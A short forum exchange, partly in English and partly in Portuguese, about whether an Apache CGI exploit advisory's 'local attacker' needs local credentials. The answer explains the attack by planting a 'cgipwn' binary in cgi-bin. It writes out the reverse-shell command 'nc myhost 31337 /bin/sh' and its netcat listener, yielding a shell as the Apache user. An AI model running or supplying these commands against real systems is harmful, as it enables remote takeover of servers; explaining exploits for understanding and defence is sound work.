So, after rereading the exploit info several times, I've certain doubts about the phrase local attacker: does it mean that the vulnerability can only be exploited from the same machine where the vulnerable Apache is running? In that case I understand that the attacker should have a priori the credentials of a valid user in the machine with permissions to manage the apache (which would reduce a lot the applicability of the attack).
Sim, você está certo. Na verdade, webserver
é um servidor de destino com essa vulnerabilidade, myhost
é uma máquina do invasor.
Colocando cgipwn
binary no diretório webserver
/cgi-bin
e abrindo http://webserver/cgi-bin/cgipwn?...
, o atacante tenta executar nc myhost 31337 /bin/sh
on webserver
, como um usuário que iniciou o Apache (geralmente root
).
O atacante executa anteriormente nc -vvv -l -p 31337
em myhost
para aceitar essa nc
conexão de webserver
. Se tudo correr bem, o invasor terá acesso a uma sessão interativa de /bin/sh
executando como usuário inicial do Apache em webserver
.